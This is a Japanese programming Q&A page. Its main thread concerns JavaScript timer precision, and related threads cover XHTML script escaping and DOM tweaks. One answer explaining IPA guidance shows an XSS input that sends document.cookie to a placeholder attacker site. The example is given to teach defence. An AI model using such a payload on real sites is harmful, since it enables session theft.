いつもお世話になっています。

タイマーの実験をしてみようかと思い、タイマー関数のサンプルをちょっと触ってみて、気になることがありました。
スクリプトとしては、次のようなものです。

<HTML>
<HEAD>
<SCRIPT Language="JavaScript">
<!--
timerID = 10;
count = 0;
function timerX(){
status = "Counter is " + count++;
}
function clr(){ clearInterval(timerID); }
// -->
</SCRIPT>
<BODY bgColor="white" onLoad="timerID = setInterval('timerX()',1000);">
(以下略)

このスクリプトを実行すると、1秒毎に1カウント増えていきますから、ステータスに表示される数値は10秒で10になります。
ですから、1を指定する、つまりsetInterval('timerX()',1);にすれば、論理上、10秒で10000になるはずですよね?
ところが実際にステータスに出る数値はそうはならず、かなり低い数字になってしまいます。
そこで質問なのですが、setTimeoutまたはsetIntervalでタイマーを作る場合、ミリ秒はどのくらいまで有効なのでしょうか。
ひょっとして、マシンに依存するのでまちまちなのでしょうか。
経験等でご存じの方、お教えください。

このQ&Aに関連する最新のQ&A

A 回答 (2件)

環境に依存すると思います。


推測ですが、setIntervalの処理は例えばWindowsですと、Windowsのタイマーを使用して実装していると思われます。
その場合には、メッセージキュー内でのWM_TIMERメッセージの優先度が低いために、
実際にウィンドゥプロシージャが1ミリ秒ごとにWM_TIMERを解釈してtimerX()関数の処理をするわけではない、というのがおそらく原因でしょう。
このことは、他のプログラムを実行しながらこのカウンタを回すと、カウントされる数値がさらに小さくなることと合致します。

参考URL:http://www.microsoft.com/japan/developer/library …
    • good
    • 0
この回答へのお礼

解答ありがとうございました。
お返事が遅れて申し訳ありません。

OS自身のタイマー優先度に依存している、ということはスクリプトを組む側からはどうしようもない、ということかも知れません。
ただ、それならばなぜ、ミリ秒単位まで指定することが可能なのかが疑問です。
こういうことは仕方のないことなのでしょうか?

#まあこの辺になるとOSの開発者の問題とかになるのかな。(^^;;)

お礼日時:2002/03/24 22:38

有効な値はないと思います。



例えば、WinNT が0.0111秒ごとに動作できるとしたら、
JavaScript で0.001秒ごとの処理をしようと思っても、
0.0111 と 0.001 の歯車はうまくかみ合わない。
JavaScript で指定する値にゆとりを持たせて10秒を指定しても、
0.0111 と 10 の歯車はうまくかみ合わない。

setInterval('timerX( )',1000) は、1秒ごとに動作するけど、
ループによる次の setInterval( ) の実行の時は、初回の時の
時間を参考にせず、前回の実行から1秒後に timerX( ) を
実行しているんだと思う。
初回の時の時間を参考にしていないから、setInterval( ) が
実行されるたびに、実際の時間とのずれが蓄積されていくんだと思う。

時間のずれは発生するから、setInterval( ) でのループを
1000回ぐらいやったら、もう一度時間を取得しなおす
とかすれば、そこそこいい結果になると思います。

setInterval('timerX()',1)
のような高速処理をされるなら、setTimeout( ) の方がよさそうです。
setTimeout( ) を for( ) でループされるとか。
setTimeout( ) の方が処理が軽いらしく、高速処理ができます。
    • good
    • 0
この回答へのお礼

解答ありがとうございました。
今度、forでくくって実験してみようと思います。

お礼日時:2002/04/04 17:40

このQ&Aに関連する人気のQ&A

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aを見た人が検索しているワード

このQ&Aと関連する良く見られている質問

Q 内に書くことはできません」

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてしまいます。
エラーが表示されるタグは下記のようなものです。

<script type="text/javascript">
document.write('<img src="http://~/w3a/writelog.php?ref='+document.referrer+'" width="1" height="1" />');
</script> >

アクセスログは普通に取得できているので問題ないのですが、もし上記エラーを回避する方法があればご教授下さい。よろしくお願いします。

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてし...続きを読む

Aベストアンサー

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタグがエスケープされていないため、これがスクリプトの一部ではなく文書構成要素だと判断されるからです。XHTML 1.0 のスキーマは、script 要素内に img 要素が出現することを許していません。もちろん、スクリプトとしても正しく動作しません。

従って、XML のルールに従ってエスケープする必要があります。特に「<」と「&」は必ずエスケープしなければなりません。

document.write('&lt;img .... />');

ですが面倒なことに、「ニセモノの XHTML」ではこれが動作しなくなります。「ニセモノの XHTML」は、HTML との互換性のために script 要素内の「<」「&」をうまく扱ってくれるのですが、それが仇となり、上記では「&lt;」が「<」に戻りません。

ならば、コメント区間にするのはどうでしょう。XML でもコメント内なら「<」「&」が現れても大丈夫です(ただし「--」だけは駄目です)。

<script type="text/javascript"><!--
document.write('<img .... />');
//--></script>

「ニセモノの XHTML」ならこれでも構いません。しかし、「ホンモノの XHTML」では、コメントは本当に破棄されてしまい、上記では動作すらしなくなります。

そこで、XML/HTML のルールを使わず、JavaScript のルールでエスケープすることを考えます。

document.write('\u003Cimg .... />');

これなら大丈夫でしょう。XML/HTML に限らず、言語が混在する際は必ず適切なエスケープを施す必要があります。エスケープを避けたければ外部スクリプトにして下さい。


なお、ここには別の問題があります。そもそも「ホンモノの XHTML」では、document.write を使用できません。これは HTML 互換の機能だからです(HTML5 に明記されています)。

XHTML を採用するのであれば、それが「ホンモノ」でも「ニセモノ」でも大丈夫なよう、document.write に頼らないコードを作成して下さい。あるいは try...catch で括るなどして、「ニセモノ」として処理されたときのみコードが動作するよう工夫して下さい。あるいはいっそ、XHTML を止めるのも 1 つの選択でしょう。

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタ...続きを読む

Q 要素の内

▽安全なウェブサイトの作り方
  http://www.ipa.go.jp/security/vuln/documents/website_security.pdf

><script>...</script> 要素の内容を動的に生成しない
>ウェブページに出力する<script>...</script>要素の内容が、外部からの入力に依存する形で動的に生成される場合、任意のスクリプトが埋め込まれてしまう可能性があります

・P25で上記のように書かれているのですが、理解できません(何故ここだけ動的生成してはいけないのか等)
・具体的にどのようにして埋め込まれる恐れがあるのでしょうか?
・またここで書いている内容は、下記何れを指しているのでしょうか?
・ココカラ<script>...</script>ココマデ
・<script>ココカラ...ココマデ</script>

Aベストアンサー

攻撃の容易性でしょう。

この脆弱性を付く攻撃をする際に一番苦労するのが <script> をどうやって埋め込むかです。これは入力内容のエスケープ処理で大体は塞がれてしまうのですが、<script> 要素内に直接埋めこめられるならその問題が無いので、かなり攻撃しやすいサイトとなります。

埋め込み方法ですが、以下の様な生成をするサイトの場合なら

入力内容: 太郎
出力内容: <script>alert('こんにちは太郎さん')</script>

そのサイト内で使用している cookie 内容を盗聴するために、以下のように攻撃できます。

入力内容: ');window.location='http://攻撃サイト/'+document.cookie;a=('
出力内容: <script>alert('こんにちは');window.location='http://攻撃サイト/'+document.cookie;a=('さん')</script>

引用符のエスケープ処理で塞がれるかもしれませんが、それでも対処できる余地はあります。

Q

数十の<a>タグがあるHTMLファイルの中で、
<div id="blank">で囲まれた<a>タグ群のみをすべてtarget="_blank"にしたいと考えています。
該当する<a>タグすべてにtarget="_blank"を書くと、HTMLファイルの容量が大きくなるので、CSSのIDとJavaScriptを組み合わせて、実現できないものでしょうか。

Aベストアンサー

<base target="_blank">
<div id="blank">
 <!-- -->
</div>
<base target="_self">

Q

▼次のようにページ内のdivタグのidの名前によって、formタグ内の要素をdisableにすることはJava scriptによって可能でしょうか?

<div id="AA">のとき、別の場所にある<form id="BB">内のselect要素などすべての要素をdisableにする。

また同時に、id="BB"に指定したスタイルシートの記述を書き換えることは可能でしょうか?

何かよい方法をご存知でしたら教えてください。よろしくお願いいたします。

Aベストアンサー

>なぜか時々エラーが出ます。
ウチでちょっと試した程度ではエラーが発生しませんでした。
できましたら、発生したときのメッセージや場所また、ブラウザの種類なども教えてください。

以下は、予防的な意味での注意点についてちょっと書きます。
>return false;

は、必要ないです。
書かない方がいいと思います。
==nullの場合の処理が必要ないなら
!=nullにすればよいです。
もしくは
return false;でなくて
;
のように空文でもよいです。
あと、idに使っている名前と同じ名前を変数名として使わない方が良いです。
つまり、
id="soldout"の時に
var soldout;という風にはしない方が良いです。
同じでなければ、cartFormでもなんでもかまいません。
あと、scriptは、
<!--
(スクリプトの中身)
//-->
のように
<!--
//-->
で囲むようにします。

getElementById
は、ブラウザやのブラウザのバージョンによっては使えないことがあります。
その場合は、使えるかどうかを調べる必要があります。

<script type="text/javascript">
<!--
function stockStatus (num){
var f=document.getElementById("soldout");

if(f!=null){
for (var i =0; i<=f.length -1 ;i++){
f.elements[i].disabled=num;
}
}
}
//-->
</script>

>なぜか時々エラーが出ます。
ウチでちょっと試した程度ではエラーが発生しませんでした。
できましたら、発生したときのメッセージや場所また、ブラウザの種類なども教えてください。

以下は、予防的な意味での注意点についてちょっと書きます。
>return false;

は、必要ないです。
書かない方がいいと思います。
==nullの場合の処理が必要ないなら
!=nullにすればよいです。
もしくは
return false;でなくて
;
のように空文でもよいです。
あと、idに使っている名前と同じ名前を変数名として...続きを読む


人気Q&Aランキング

おすすめ情報